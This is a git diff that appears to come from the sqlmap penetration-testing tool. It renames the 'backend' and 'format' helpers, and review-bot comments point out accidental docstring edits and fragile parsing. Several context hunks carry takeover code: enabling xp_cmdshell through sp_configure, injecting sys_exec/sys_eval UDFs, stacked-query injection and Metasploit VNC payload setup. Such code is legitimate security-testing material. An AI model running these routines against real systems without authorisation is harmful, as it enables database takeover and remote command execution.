- msg += "correct [%s (default)/%s] " % (kb.dbms, dbms)
-
- while True:
- inp = readInput(msg, default=kb.dbms)
-
- if aliasToDbmsEnum(inp) == kb.dbms:
- break
- elif aliasToDbmsEnum(inp) == dbms:
- kb.dbms = aliasToDbmsEnum(inp)
- break
- else:
- warnMsg = "invalid value"
- logger.warn(warnMsg)
-
- elif kb.dbms is None:
- kb.dbms = aliasToDbmsEnum(dbms)
-
- return kb.dbms
-
- @staticmethod
- def setVersion(version):
- if isinstance(version, basestring):
- kb.dbmsVersion = [ version ]
-
- return kb.dbmsVersion
-
- @staticmethod
- def setVersionList(versionsList):
- if isinstance(versionsList, list):
- kb.dbmsVersion = versionsList
- elif isinstance(version, basestring):
- backend.setVersion(versionsList)
- else:
- logger.error("invalid format of versionsList")
-
- @staticmethod
- def forceDbms(dbms):
- kb.misc.forcedDbms = aliasToDbmsEnum(dbms)
-
- @staticmethod
- def flushForcedDbms():
- kb.misc.forcedDbms = None
-
- @staticmethod
- def setOs(os):
- if os is None:
- return None
-
- # Little precaution, in theory this condition should always be false
- elif kb.os is not None and kb.os != os:
- msg = "sqlmap previously fingerprinted back-end DBMS "
- msg += "operating system %s. However now it has " % kb.os
- msg += "been fingerprinted to be %s. " % os
- msg += "Please, specify which OS is "
- msg += "correct [%s (default)/%s] " % (kb.os, os)
-
- while True:
- inp = readInput(msg, default=kb.os)
-
- if inp == kb.os:
- break
- elif inp == os:
- kb.os = inp
- break
- else:
- warnMsg = "invalid value"
- logger.warn(warnMsg)
-
- elif kb.os is None:
- kb.os = os
-
- return kb.os
-
- # Get methods
- @staticmethod
- def getForcedDbms():
- return aliasToDbmsEnum(kb.misc.forcedDbms)
-
- @staticmethod
- def getDbms():
- return aliasToDbmsEnum(kb.dbms)
-
- @staticmethod
- def getErrorParsedDBMSes():
- """
- Returns array with parsed DBMS names till now
-
- This functions is called to:
-
- 1. Sort the tests, getSortedInjectionTests() - detection phase.
- 2. Ask user whether or not skip specific DBMS tests in detection phase,
- lib/controller/checks.py - detection phase.
- 3. Sort the fingerprint of the DBMS, lib/controller/handler.py -
- fingerprint phase.
- """
-
- return kb.htmlFp
-
- @staticmethod
- def getIdentifiedDbms():
- dbms = None
-
- if backend.getForcedDbms() is not None:
- dbms = backend.getForcedDbms()
- elif backend.getDbms() is not None:
- dbms = kb.dbms
- elif conf.dbms is not None:
- dbms = conf.dbms
- elif len(backend.getErrorParsedDBMSes()) > 0:
- dbms = backend.getErrorParsedDBMSes()[0]
-
- return aliasToDbmsEnum(dbms)
-
- @staticmethod
- def getVersion():
- if len(kb.dbmsVersion) > 0:
- return kb.dbmsVersion[0]
- else:
- return None
-
- @staticmethod
- def getVersionList():
- if len(kb.dbmsVersion) > 0:
- return kb.dbmsVersion
- else:
- return None
-
- # Comparison methods
- @staticmethod
- def isDbms(dbms):
- return backend.getDbms() is not None and backend.getDbms() == aliasToDbmsEnum(dbms)
-
- @staticmethod
- def isDbmsWithin(aliases):
- return backend.getDbms() is not None and backend.getDbms().lower() in aliases
-
- @staticmethod
- def isVersion(version):
- return backend.getVersion() is not None and backend.getVersion() == version
-
- @staticmethod
- def isVersionWithin(versionList):
- if backend.getVersionList() is None:
- return False
-
- for dbmsVersion in backend.getVersionList():
- if dbmsVersion == UNKNOWN_DBMS_VERSION:
- continue
- elif dbmsVersion in versionList:
- return True
-
- return False
-
- @staticmethod
- def isVersionGreaterOrEqualThan(version):
- return backend.getVersion() is not None and str(backend.getVersion()) >= str(version)
-
def showHttpErrorCodes():
"""
Shows all HTTP error codes raised till now
diff --git a/lib/core/option.py b/lib/core/option.py
index 4b7110ded..01ce63e6f 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -24,7 +24,7 @@ from extra.clientform.clientform import ParseResponse
from extra.keepalive import keepalive
from extra.xmlobject import xmlobject
from lib.controller.checks import checkConnection
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getConsoleWidth
from lib.core.common import getFileItems
@@ -595,7 +595,7 @@ def __setDBMS():
dbmsRegExp = re.search("%s ([\d\.]+)" % firstRegExp, conf.dbms, re.I)
if dbmsRegExp:
- backend.setVersion(str(dbmsRegExp.group(2)))
+ Backend.setVersion(str(dbmsRegExp.group(2)))
if conf.dbms not in SUPPORTED_DBMS:
errMsg = "you provided an unsupported back-end database management "
@@ -1255,7 +1255,7 @@ def __setKnowledgeBaseAttributes(flushAll=True):
def __saveCmdline():
"""
Saves the command line options on a sqlmap configuration INI file
- format.
+ Format.
"""
if not conf.saveCmdline:
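Review bot: The `Format.` that now ends the `__saveCmdline` docstring is an accidental hit of the `format` → `Format` identifier rename; it is ordinary prose, not a reference to the class, and should stay `format.`. The same happens in the three lib/core/xmldump.py hunks, where "xml Format." and "xml text Format." replace lower-case prose in the `XMLDump`, `__createTextNode` and `__createAttribute` docstrings. Limiting the rename to code references, for example matching `format.` only when an identifier follows as in `format.humanize`, would leave comments and docstrings alone.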
diff --git a/lib/core/session.py b/lib/core/session.py
index 0609edf24..f4ce4b087 100644
--- a/lib/core/session.py
+++ b/lib/core/session.py
@@ -9,8 +9,8 @@ See the file 'doc/COPYING' for copying permission
import re
-from lib.core.common import backend
-from lib.core.common import format
+from lib.core.common import Backend
+from lib.core.common import Format
from lib.core.common import dataToSessionFile
from lib.core.common import getFilteredPageContent
from lib.core.common import readInput
@@ -91,9 +91,9 @@ def setDbms(dbms):
if dbmsRegExp:
dbms = dbmsRegExp.group(1)
- backend.setDbms(dbms)
+ Backend.setDbms(dbms)
- logger.info("the back-end DBMS is %s" % backend.getDbms())
+ logger.info("the back-end DBMS is %s" % Backend.getDbms())
def setOs():
"""
@@ -120,15 +120,15 @@ def setOs():
return
if "type" in kb.bannerFp:
- kb.os = format.humanize(kb.bannerFp["type"])
+ kb.os = Format.humanize(kb.bannerFp["type"])
infoMsg = "the back-end DBMS operating system is %s" % kb.os
if "distrib" in kb.bannerFp:
- kb.osVersion = format.humanize(kb.bannerFp["distrib"])
+ kb.osVersion = Format.humanize(kb.bannerFp["distrib"])
infoMsg += " %s" % kb.osVersion
if "sp" in kb.bannerFp:
- kb.osSP = int(format.humanize(kb.bannerFp["sp"]).replace("Service Pack ", ""))
+ kb.osSP = int(Format.humanize(kb.bannerFp["sp"]).replace("Service Pack ", ""))
elif "sp" not in kb.bannerFp and kb.os == "Windows":
kb.osSP = 0
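Review bot: The `kb.osSP = int(...)` line converts banner-derived text straight to an integer with no guard, so any value that is not exactly "Service Pack " followed by digits raises ValueError inside `setOs`. `kb.bannerFp` appears to be filled from the remote server's banner, which the tool does not control, so it is worth parsing defensively: `sp = Format.humanize(kb.bannerFp["sp"]).replace("Service Pack ", "")` followed by `kb.osSP = int(sp) if sp.isdigit() else None`. Whether `None` is acceptable to the other users of `kb.osSP` needs checking. `setOs` starts and ends outside this hunk.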
@@ -195,11 +195,11 @@ def resumeConfKb(expression, url, value):
test = readInput(message, default="N")
if not test or test[0] in ("n", "N"):
- backend.setDbms(dbms)
- backend.setVersionList(dbmsVersion)
+ Backend.setDbms(dbms)
+ Backend.setVersionList(dbmsVersion)
else:
- backend.setDbms(dbms)
- backend.setVersionList(dbmsVersion)
+ Backend.setDbms(dbms)
+ Backend.setVersionList(dbmsVersion)
elif expression == "OS" and url == conf.url:
os = unSafeFormatString(value[:-1])
@@ -236,7 +236,7 @@ def resumeConfKb(expression, url, value):
if '.' in table:
db, table = table.split('.')
else:
- db = "%s%s" % (backend.getIdentifiedDbms(), METADB_SUFFIX)
+ db = "%s%s" % (Backend.getIdentifiedDbms(), METADB_SUFFIX)
logMsg = "resuming brute forced table name "
logMsg += "'%s' from session file" % table
@@ -251,7 +251,7 @@ def resumeConfKb(expression, url, value):
if '.' in table:
db, table = table.split('.')
else:
- db = "%s%s" % (backend.getIdentifiedDbms(), METADB_SUFFIX)
+ db = "%s%s" % (Backend.getIdentifiedDbms(), METADB_SUFFIX)
logMsg = "resuming brute forced column name "
logMsg += "'%s' for table '%s' from session file" % (colName, table)
diff --git a/lib/core/shell.py b/lib/core/shell.py
index 064b6912b..2a7186ef3 100644
--- a/lib/core/shell.py
+++ b/lib/core/shell.py
@@ -12,7 +12,7 @@ import os
import rlcompleter
from lib.core import readlineng as readline
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
@@ -35,7 +35,7 @@ def loadHistory():
def queriesForAutoCompletion():
autoComplQueries = {}
- for item in queries[backend.getIdentifiedDbms()]._toflat():
+ for item in queries[Backend.getIdentifiedDbms()]._toflat():
if item._has_key('query') and len(item.query) > 1 and item._name != 'blind':
autoComplQueries[item.query] = None
diff --git a/lib/core/unescaper.py b/lib/core/unescaper.py
index 246943219..a57a37954 100644
--- a/lib/core/unescaper.py
+++ b/lib/core/unescaper.py
@@ -7,12 +7,12 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.datatype import advancedDict
class Unescaper(advancedDict):
def unescape(self, expression, quote=True, dbms=None):
- identifiedDbms = backend.getIdentifiedDbms()
+ identifiedDbms = Backend.getIdentifiedDbms()
if not expression:
return expression
diff --git a/lib/core/xmldump.py b/lib/core/xmldump.py
index 31f814ff6..0bbe70818 100644
--- a/lib/core/xmldump.py
+++ b/lib/core/xmldump.py
@@ -76,7 +76,7 @@ ENTITIES = {'"':'"',"'":"'"}
class XMLDump:
'''
- This class purpose is to dump the data into an xml format.
+ This class purpose is to dump the data into an xml Format.
The format of the xml file is described in the scheme file xml/sqlmap.xsd
'''
@@ -118,7 +118,7 @@ class XMLDump:
def __createTextNode(self,data):
'''
Creates a text node with utf8 data inside.
- The text is escaped to an fit the xml text format.
+ The text is escaped to an fit the xml text Format.
'''
if data is None :
return self.__doc.createTextNode(u'')
@@ -129,7 +129,7 @@ class XMLDump:
def __createAttribute(self,attrName,attrValue):
'''
Creates an attribute node with utf8 data inside.
- The text is escaped to an fit the xml text format.
+ The text is escaped to an fit the xml text Format.
'''
attr = self.__doc.createAttribute(attrName)
if attrValue is None :
diff --git a/lib/parse/banner.py b/lib/parse/banner.py
index 9c90d2a72..8e14a8963 100644
--- a/lib/parse/banner.py
+++ b/lib/parse/banner.py
@@ -13,7 +13,7 @@ from xml.sax.handler import ContentHandler
from lib.core.common import checkFile
from lib.core.common import getCompiledRegex
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import parseXmlFile
from lib.core.common import sanitizeStr
from lib.core.data import kb
@@ -97,13 +97,13 @@ def bannerParser(banner):
xmlfile = None
- if backend.getIdentifiedDbms() == DBMS.MSSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MSSQL:
xmlfile = paths.MSSQL_XML
- elif backend.getIdentifiedDbms() == DBMS.MYSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MYSQL:
xmlfile = paths.MYSQL_XML
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
xmlfile = paths.ORACLE_XML
- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
xmlfile = paths.PGSQL_XML
if not xmlfile:
@@ -111,7 +111,7 @@ def bannerParser(banner):
checkFile(xmlfile)
- if backend.getIdentifiedDbms() == DBMS.MSSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MSSQL:
handler = MSSQLBannerHandler(banner, kb.bannerFp)
parseXmlFile(xmlfile, handler)
diff --git a/lib/request/direct.py b/lib/request/direct.py
index 8b1b42b7a..be98cdbe6 100644
--- a/lib/request/direct.py
+++ b/lib/request/direct.py
@@ -9,7 +9,7 @@ See the file 'doc/COPYING' for copying permission
from lib.core.agent import agent
from lib.core.common import dataToSessionFile
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getUnicode
from lib.core.convert import base64pickle
from lib.core.convert import base64unpickle
@@ -26,7 +26,7 @@ def direct(query, content=True):
select = True
query = agent.payloadDirect(query)
- if backend.getIdentifiedDbms() == DBMS.ORACLE and query.startswith("SELECT ") and " FROM " not in query:
+ if Backend.getIdentifiedDbms() == DBMS.ORACLE and query.startswith("SELECT ") and " FROM " not in query:
query = "%s FROM DUAL" % query
for sqlTitle, sqlStatements in SQL_STATEMENTS.items():
diff --git a/lib/request/inject.py b/lib/request/inject.py
index edbcd791a..ff4fd1eb7 100644
--- a/lib/request/inject.py
+++ b/lib/request/inject.py
@@ -11,7 +11,7 @@ import re
import time
from lib.core.agent import agent
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import calculateDeltaSeconds
from lib.core.common import cleanQuery
from lib.core.common import dataToSessionFile
@@ -54,7 +54,7 @@ def __goInference(payload, expression, charsetType=None, firstChar=None, lastCha
timeBasedCompare = (kb.technique in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED))
- if (conf.eta or conf.threads > 1) and backend.getIdentifiedDbms() and not timeBasedCompare:
+ if (conf.eta or conf.threads > 1) and Backend.getIdentifiedDbms() and not timeBasedCompare:
_, length, _ = queryOutputLength(expression, payload)
else:
length = None
@@ -140,7 +140,7 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
_, _, _, _, _, expressionFieldsList, expressionFields, _ = agent.getFields(expression)
rdbRegExp = re.search("RDB\$GET_CONTEXT\([^)]+\)", expression, re.I)
- if rdbRegExp and backend.getIdentifiedDbms() == DBMS.FIREBIRD:
+ if rdbRegExp and Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
expressionFieldsList = [expressionFields]
if len(expressionFieldsList) > 1:
@@ -155,14 +155,14 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
# forge the SQL limiting the query output one entry per time
# NOTE: I assume that only queries that get data from a table
# can return multiple entries
- if fromUser and " FROM " in expression.upper() and ((backend.getIdentifiedDbms() not in FROM_TABLE) or (backend.getIdentifiedDbms() in FROM_TABLE and not expression.upper().endswith(FROM_TABLE[backend.getIdentifiedDbms()]))):
- limitRegExp = re.search(queries[backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
+ if fromUser and " FROM " in expression.upper() and ((Backend.getIdentifiedDbms() not in FROM_TABLE) or (Backend.getIdentifiedDbms() in FROM_TABLE and not expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]))):
+ limitRegExp = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, expression, re.I)
topLimit = re.search("TOP\s+([\d]+)\s+", expression, re.I)
- if limitRegExp or (backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
- limitGroupStart = queries[backend.getIdentifiedDbms()].limitgroupstart.query
- limitGroupStop = queries[backend.getIdentifiedDbms()].limitgroupstop.query
+ if limitRegExp or (Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE) and topLimit):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
+ limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
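Review bot: `Backend.getIdentifiedDbms()` is called three times inside the single `if fromUser and " FROM " in expression.upper() ...` condition and again on almost every following line, which makes these conditions hard to read and review. Binding it once near the top of `__goInferenceProxy`, e.g. `dbms = Backend.getIdentifiedDbms()`, and then writing `dbms in FROM_TABLE` and `queries[dbms].limitregexp.query` would shorten them considerably; this assumes the identified DBMS cannot change while the function runs, which should be confirmed. The same LIMIT/TOP parsing block is repeated in the `errorUse` hunks of lib/techniques/error/use.py and in `unionUse` in lib/techniques/inband/union/use.py, so a shared helper would remove the triplication. The function body starts before and continues after this hunk.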
@@ -170,10 +170,10 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
stopLimit = limitRegExp.group(int(limitGroupStop))
limitCond = int(stopLimit) > 1
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
if limitRegExp:
- limitGroupStart = queries[backend.getIdentifiedDbms()].limitgroupstart.query
- limitGroupStop = queries[backend.getIdentifiedDbms()].limitgroupstop.query
+ limitGroupStart = queries[Backend.getIdentifiedDbms()].limitgroupstart.query
+ limitGroupStop = queries[Backend.getIdentifiedDbms()].limitgroupstop.query
if limitGroupStart.isdigit():
startLimit = int(limitRegExp.group(int(limitGroupStart)))
@@ -185,7 +185,7 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
stopLimit = int(topLimit.group(1))
limitCond = int(stopLimit) > 1
- elif backend.getIdentifiedDbms() == DBMS.ORACLE:
+ elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
limitCond = False
else:
limitCond = True
@@ -199,23 +199,23 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
# From now on we need only the expression until the " LIMIT "
# (or similar, depending on the back-end DBMS) word
- if backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
+ if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):
stopLimit += startLimit
- untilLimitChar = expression.index(queries[backend.getIdentifiedDbms()].limitstring.query)
+ untilLimitChar = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query)
expression = expression[:untilLimitChar]
- elif backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
+ elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
stopLimit += startLimit
if not stopLimit or stopLimit <= 1:
- if backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().endswith(FROM_TABLE[backend.getIdentifiedDbms()]):
+ if Backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
test = False
else:
test = True
if test:
# Count the number of SQL query entries output
- countFirstField = queries[backend.getIdentifiedDbms()].count.query % expressionFieldsList[0]
+ countFirstField = queries[Backend.getIdentifiedDbms()].count.query % expressionFieldsList[0]
countedExpression = expression.replace(expressionFields, countFirstField, 1)
if re.search(" ORDER BY ", expression, re.I):
@@ -309,8 +309,8 @@ def __goInferenceProxy(expression, fromUser=False, expected=None, batch=False, r
return outputs
- elif backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper():
- expression += FROM_TABLE[backend.getIdentifiedDbms()]
+ elif Backend.getIdentifiedDbms() in FROM_TABLE and expression.upper().startswith("SELECT ") and " FROM " not in expression.upper():
+ expression += FROM_TABLE[Backend.getIdentifiedDbms()]
outputs = __goInferenceFields(expression, expressionFields, expressionFieldsList, payload, expected, resumeValue=resumeValue, charsetType=charsetType, firstChar=firstChar, lastChar=lastChar)
returnValue = ", ".join([output for output in outputs])
@@ -492,7 +492,7 @@ def goStacked(expression, silent=False):
if conf.direct:
return direct(expression), None
- comment = queries[backend.getIdentifiedDbms()].comment.query
+ comment = queries[Backend.getIdentifiedDbms()].comment.query
query = agent.prefixQuery("; %s" % expression)
query = agent.suffixQuery("%s;%s" % (query, comment))
payload = agent.payload(newValue=query)
diff --git a/lib/takeover/abstraction.py b/lib/takeover/abstraction.py
index 0d16c3d18..69d29de13 100644
--- a/lib/takeover/abstraction.py
+++ b/lib/takeover/abstraction.py
@@ -8,7 +8,7 @@ See the file 'doc/COPYING' for copying permission
"""
from lib.core.common import dataToStdout
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import isTechniqueAvailable
from lib.core.common import readInput
from lib.core.data import conf
@@ -41,10 +41,10 @@ class Abstraction(Web, UDF, xp_cmdshell):
if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
self.webBackdoorRunCmd(cmd)
- elif backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ elif Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
self.udfExecCmd(cmd, silent=silent)
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
self.xpCmdshellExecCmd(cmd, silent=silent)
else:
@@ -55,10 +55,10 @@ class Abstraction(Web, UDF, xp_cmdshell):
if self.webBackdoorUrl and not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED):
return self.webBackdoorRunCmd(cmd)
- elif backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ elif Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
return self.udfEvalCmd(cmd, first, last)
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
return self.xpCmdshellEvalCmd(cmd, first, last)
else:
@@ -93,13 +93,13 @@ class Abstraction(Web, UDF, xp_cmdshell):
logger.info(infoMsg)
else:
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
infoMsg = "going to use injected sys_eval and sys_exec "
infoMsg += "user-defined functions for operating system "
infoMsg += "command execution"
logger.info(infoMsg)
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
infoMsg = "going to use xp_cmdshell extended procedure for "
infoMsg += "operating system command execution"
logger.info(infoMsg)
@@ -151,9 +151,9 @@ class Abstraction(Web, UDF, xp_cmdshell):
warnMsg += "the session user is not a database administrator"
logger.warn(warnMsg)
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
self.udfInjectSys()
- elif backend.getIdentifiedDbms() == DBMS.MSSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
if mandatory:
self.xpCmdshellInit()
else:
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index d00783273..9018514a2 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -19,7 +19,7 @@ from subprocess import PIPE
from subprocess import Popen as execute
from lib.core.common import dataToStdout
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import getLocalIP
from lib.core.common import getRemoteIP
from lib.core.common import getUnicode
@@ -187,13 +187,13 @@ class Metasploit:
if __payloadStr == "windows/vncinject":
choose = False
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
debugMsg = "by default MySQL on Windows runs as SYSTEM "
debugMsg += "user, it is likely that the the VNC "
debugMsg += "injection will be successful"
logger.debug(debugMsg)
- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
choose = True
warnMsg = "by default PostgreSQL on Windows runs as "
@@ -201,12 +201,12 @@ class Metasploit:
warnMsg += "injection will be successful"
logger.warn(warnMsg)
- elif backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")):
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
choose = True
warnMsg = "it is unlikely that the VNC injection will be "
warnMsg += "successful because usually Microsoft SQL Server "
- warnMsg += "%s runs as Network Service " % backend.getVersion()
+ warnMsg += "%s runs as Network Service " % Backend.getVersion()
warnMsg += "or the Administrator is not logged in"
logger.warn(warnMsg)
@@ -230,12 +230,12 @@ class Metasploit:
break
elif choice == "1":
- if backend.getIdentifiedDbms() == DBMS.PGSQL:
+ if Backend.getIdentifiedDbms() == DBMS.PGSQL:
logger.warn("beware that the VNC injection might not work")
break
- elif backend.getIdentifiedDbms() == DBMS.MSSQL and backend.isVersionWithin(("2005", "2008")):
+ elif Backend.getIdentifiedDbms() == DBMS.MSSQL and Backend.isVersionWithin(("2005", "2008")):
break
elif not choice.isdigit():
@@ -555,7 +555,7 @@ class Metasploit:
# This is useful for sqlmap because on PostgreSQL it is not
# possible to write files bigger than 8192 bytes abusing the
# lo_export() feature implemented in sqlmap.
- if backend.getIdentifiedDbms() == DBMS.PGSQL:
+ if Backend.getIdentifiedDbms() == DBMS.PGSQL:
self.__fileFormat = "exe-small"
else:
self.__fileFormat = "exe"
@@ -657,7 +657,7 @@ class Metasploit:
self.__forgeMsfConsoleResource()
self.__forgeMsfConsoleCmd()
- if backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
+ if Backend.getIdentifiedDbms() in ( DBMS.MYSQL, DBMS.PGSQL ):
self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self.__randFile)
else:
self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self.__randFile)
diff --git a/lib/takeover/udf.py b/lib/takeover/udf.py
index 1764b46dc..d6baae45d 100644
--- a/lib/takeover/udf.py
+++ b/lib/takeover/udf.py
@@ -11,7 +11,7 @@ import os
from lib.core.agent import agent
from lib.core.common import dataToStdout
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import isTechniqueAvailable
from lib.core.common import readInput
from lib.core.data import conf
@@ -51,7 +51,7 @@ class UDF:
def __checkExistUdf(self, udf):
logger.info("checking if UDF '%s' already exist" % udf)
- query = agent.forgeCaseStatement(queries[backend.getIdentifiedDbms()].check_udf.query % (udf, udf))
+ query = agent.forgeCaseStatement(queries[Backend.getIdentifiedDbms()].check_udf.query % (udf, udf))
exists = inject.getValue(query, resumeValue=False, unpack=False, charsetType=2)
if exists == "1":
@@ -104,7 +104,7 @@ class UDF:
return output
def udfCheckNeeded(self):
- if ( not conf.rFile or ( conf.rFile and backend.getIdentifiedDbms() != DBMS.PGSQL ) ) and "sys_fileread" in self.sysUdfs:
+ if ( not conf.rFile or ( conf.rFile and Backend.getIdentifiedDbms() != DBMS.PGSQL ) ) and "sys_fileread" in self.sysUdfs:
self.sysUdfs.pop("sys_fileread")
if not conf.osPwn:
@@ -143,9 +143,9 @@ class UDF:
if udf in self.udfToCreate and udf not in self.createdUdf:
self.udfCreateFromSharedLib(udf, inpRet)
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
supportTblType = "longtext"
- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
supportTblType = "text"
self.udfCreateSupportTbl(supportTblType)
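Review bot: `supportTblType` is assigned only in the MySQL and PostgreSQL branches, so if `self.udfCreateSupportTbl(supportTblType)` sits after the if/elif (indentation is not recoverable in this view), any other back-end reaches the call with the name unbound. An explicit `else:` that raises `sqlmapUnsupportedFeatureException`, as `udfInjectCustom` already does for unsupported back-ends, would make the precondition visible instead of surfacing as an UnboundLocalError. The later hunk that sets `defaultType` to "string" or "text" has the same shape. The enclosing method starts outside this hunk.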
@@ -156,8 +156,8 @@ class UDF:
self.udfInjectCore(self.sysUdfs)
def udfInjectCustom(self):
- if backend.getIdentifiedDbms() not in ( DBMS.MYSQL, DBMS.PGSQL ):
- errMsg = "UDF injection feature is not yet implemented on %s" % backend.getIdentifiedDbms()
+ if Backend.getIdentifiedDbms() not in ( DBMS.MYSQL, DBMS.PGSQL ):
+ errMsg = "UDF injection feature is not yet implemented on %s" % Backend.getIdentifiedDbms()
raise sqlmapUnsupportedFeatureException(errMsg)
if not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct:
@@ -236,9 +236,9 @@ class UDF:
else:
logger.warn("you need to specify the name of the UDF")
- if backend.getIdentifiedDbms() == DBMS.MYSQL:
+ if Backend.getIdentifiedDbms() == DBMS.MYSQL:
defaultType = "string"
- elif backend.getIdentifiedDbms() == DBMS.PGSQL:
+ elif Backend.getIdentifiedDbms() == DBMS.PGSQL:
defaultType = "text"
self.udfs[udfName]["input"] = []
diff --git a/lib/takeover/xp_cmdshell.py b/lib/takeover/xp_cmdshell.py
index fc31964f5..5a4e261b7 100644
--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -7,7 +7,7 @@ Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
"""
-from lib.core.common import backend
+from lib.core.common import Backend
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import wasLastRequestDelayed
@@ -30,7 +30,7 @@ class xp_cmdshell:
def __xpCmdshellCreate(self):
cmd = ""
- if backend.isVersionWithin(("2005", "2008")):
+ if Backend.isVersionWithin(("2005", "2008")):
logger.debug("activating sp_OACreate")
cmd += "EXEC master..sp_configure 'show advanced options', 1; "
@@ -49,7 +49,7 @@ class xp_cmdshell:
cmd += "EXEC sp_OADestroy @ID'; "
cmd += "EXEC master..sp_executesql @%s;" % self.__randStr
- if backend.isVersionWithin(("2005", "2008")):
+ if Backend.isVersionWithin(("2005", "2008")):
cmd += " RECONFIGURE WITH OVERRIDE;"
inject.goStacked(cmd)
@@ -81,7 +81,7 @@ class xp_cmdshell:
return cmd
def __xpCmdshellConfigure(self, mode):
- if backend.isVersionWithin(("2005", "2008")):
+ if Backend.isVersionWithin(("2005", "2008")):
cmd = self.__xpCmdshellConfigure2005(mode)
else:
cmd = self.__xpCmdshellConfigure2000(mode)
diff --git a/lib/techniques/blind/inference.py b/lib/techniques/blind/inference.py
index 50e177039..2c4f5cd0c 100644
--- a/lib/techniques/blind/inference.py
